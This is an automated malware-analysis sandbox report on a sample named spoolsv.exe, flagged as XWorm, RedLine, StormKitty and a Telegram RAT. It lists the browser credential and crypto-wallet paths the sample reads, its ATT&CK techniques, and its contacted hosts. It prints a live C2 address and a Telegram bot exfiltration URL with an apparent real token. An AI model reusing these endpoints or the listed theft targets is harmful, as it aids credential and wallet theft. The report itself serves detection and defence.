                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                            Source: Yara matchFile source: 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: attzwu.exe PID: 8096, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 27.0.attzwu.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.2540965621.0000000000E22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: attzwu.exe PID: 8096, type: MEMORYSTR
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		11
                            Process Injection                            		11
                            Deobfuscate/Decode Files or Information                            		LSASS Memory2
                            File and Directory Discovery                            		Remote Desktop Protocol3
                            Data from Local System                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		21
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		21
                            Obfuscated Files or Information                            		Security Account Manager135
                            System Information Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                            Registry Run Keys / Startup Folder                            		2
                            Software Packing                            		NTDS471
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture1
                            Non-Standard Port                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging2
                            Non-Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials261
                            Virtualization/Sandbox Evasion                            		VNCGUI Input Capture23
                            Application Layer Protocol                            		Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Modify Registry                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570972 Sample: spoolsv.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 48 f8terat.ddns.net 2->48 50 api.telegram.org 2->50 52 3 other IPs or domains 2->52 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 70 24 other signatures 2->70 8 spoolsv.exe 20 1002 2->8         started        13 spoolsv.exe 2->13         started        15 spoolsv.exe 2->15         started        17 3 other processes 2->17 signatures3 66 Uses dynamic DNS services 48->66 68 Uses the Telegram API (likely for C&C communication) 50->68 process4 dnsIp5 54 f8terat.ddns.net 78.70.235.238, 1912, 49837, 49975 TELIANET-SWEDENTeliaCompanySE Sweden 8->54 56 ip-api.com 208.95.112.1, 49702, 80 TUT-ASUS United States 8->56 58 api.telegram.org 149.154.167.220, 443, 49830 TELEGRAMRU United Kingdom 8->58 38 C:\Users\user\AppData\Local\...\store.jfm.ENC, DOS 8->38 dropped 40 C:\Users\user\AppData\...\wctDE6E.tmp.ENC, data 8->40 dropped 42 C:\Users\user\AppData\...\wctB366.tmp.ENC, data 8->42 dropped 46 101 other files (99 malicious) 8->46 dropped 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->82 84 Protects its processes via BreakOnTermination flag 8->84 86 Bypasses PowerShell execution policy 8->86 88 5 other signatures 8->88 19 attzwu.exe 8->19         started        22 powershell.exe 8->22         started        24 powershell.exe 8->24         started        26 4 other processes 8->26 44 C:\Users\user\AppData\...\spoolsv.exe.log, CSV 13->44 dropped file6 signatures7 process8 signatures9 72 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->72 74 Found many strings related to Crypto-Wallets (likely being stolen) 19->74 76 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 19->76 80 2 other signatures 19->80 78 Loading BitLocker PowerShell Module 22->78 28 conhost.exe 22->28         started        30 conhost.exe 24->30         started        32 conhost.exe 26->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            spoolsv.exe88%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            spoolsv.exe100%AviraTR/Spy.Gen
                            spoolsv.exe100%Joe Sandbox ML

                            Dropped Files

                            No Antivirus matches

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://crl.mic0%Avira URL Cloudsafe
                            https://api.retailmenot.com/security/public/out/3RWA3MREY5DRNIWOCMG7AH4FOY?marketingcampaign=3RWA3MR0%Avira URL Cloudsafe
                            78.70.235.238:19120%Avira URL Cloudsafe
                            https://api.retailmenot.com/security/public/out/5V4O3ZVBGJBZLEJTSCCWGL5B4Y?marketingcampaign=5V4O3ZV0%Avira URL Cloudsafe
                            78.70.235.2380%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ip-api.com
                            		208.95.112.1
                            		truefalse
                              		high
                              f8terat.ddns.net
                              		78.70.235.238
                              		truetrue
                                		unknown
                                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                                		217.20.58.100
                                		truefalse
                                  		high
                                  api.telegram.org
                                  		149.154.167.220
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    78.70.235.238:1912true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    78.70.235.238true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.telegram.org/bot7742194912:AAGSH51C4BpkbbvEQlO-cv-lDoJZMVxqyN4/sendMessage?chat_id=5456205643&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1BE7C2BE68B9D4CE53EB%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VPWLLKOO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20HawkEye%20V1.0false
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.org/botspoolsv.exefalse
                                              		high
                                              http://tempuri.org/Entity/Id23ResponseDattzwu.exe, 0000001B.00000002.2713604809.00000000034D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.microsoftpowershell.exe, 0000000E.00000002.1652437445.00000292EEA05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id12Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.copowershell.exe, 0000000B.00000002.1511031489.0000027A707D2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1508292291.0000027A704D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1857257953.0000023732847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.retailmenot.com/security/public/out/3RWA3MREY5DRNIWOCMG7AH4FOY?marketingcampaign=3RWA3MRspoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://tempuri.org/attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id2Responseattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://tempuri.org/Entity/Id21Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id9attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id8attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id5attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepareattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id4attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/Entity/Id7attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id6attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id19Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/LimerBoy/StormKittyspoolsv.exe, 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exespoolsv.exe, 00000000.00000002.4039746911.00000000133E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1395489278.000002AE97135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1487580375.0000027A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1630052874.0000029290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id15Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namespoolsv.exe, 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE870C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A141000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id6Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://api.ip.sb/ipattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, attzwu.exe, 0000001B.00000000.2540965621.0000000000E22000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/soap/encoding/spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE872E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/scattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id1ResponseDattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id9Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.micpowershell.exe, 00000008.00000002.1405199597.000002AE9F71E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1857257953.00000237328A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Entity/Id20attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Entity/Id21attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://tempuri.org/Entity/Id22attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://tempuri.org/Entity/Id23attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Entity/Id24attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issueattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://slickdeals.net/?cno=6959959&sdtrk=bingspoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://tempuri.org/Entity/Id24Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://tempuri.org/Entity/Id1Responseattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingattzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/wsdl/spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE872E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueattzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpfalse
